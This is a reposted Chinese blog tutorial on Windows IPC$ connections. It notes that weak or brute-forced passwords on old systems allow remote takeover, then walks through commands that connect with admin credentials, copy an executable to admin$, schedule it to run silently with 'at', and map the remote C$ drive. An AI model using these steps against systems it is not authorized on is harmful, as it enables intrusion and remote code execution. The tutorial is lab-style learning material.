Windows IPC 连接详解（转）

前言
最近在看一些渗透测试的教程。打算把一些东西实践实践，加深一下印象！

今天就来看看IPC连接。虽然很老，但是很经典。

正文
什么是IPC？

IPC(Internet Process Connection)是共享"命名管道"的资源，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。

IPC$ (Internet Process Connection)国人叫他共享"命名管道"资源服务。
其实看原始英文名称我们能更好的理解他的用途和作用。
IPC$就是为“进程”间建立网络连接而存在的服务
说的再明确点就是：IPC$是一个为“各类进程”建立网络通信连接而存在的服务

 ipc利用
1.windows server 2003 与 windows xp ipc连接无需密码即可建立连接
2.暴力破解windows 密码，执行远程主机命令,获取主机权限

 

一、建立IPC连接

在CMD下输入以下命令：

net use \\192.168.0.100\ipc$ "password" /user:"administrator"

 

 

二、通过IPC传文件

在CMD下输入以下命令：

假如我要传的文件是putty.exe，admin$表示C:\WINDOWS\目录

copy putty.exe \\192.168.0.100\admin$

 

 

三、通过IPC查看对方电脑时间

在CMD下输入以下命令：

net time \\192.168.0.100

 

 

 

四、定时运行程序

在CMD下输入以下命令：

at \\192.168.0.100 19:45 putty.exe

 

 

五、确认是否启动

居然还是静默运行的。只能在任务管理器中看到的。

 

 

 

 

六、将靶机C盘文件映射到本地

在CMD下输入以下命令：

net use Z: \\192.168.0.100\c$

 

 

 

  

七、断开IPC连接

在CMD下输入以下命令：

net use \\192.168.0.100 /del

 

 

————————————————
版权声明：本文为CSDN博主「看不尽的尘埃」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/weixin_42936566/article/details/86555918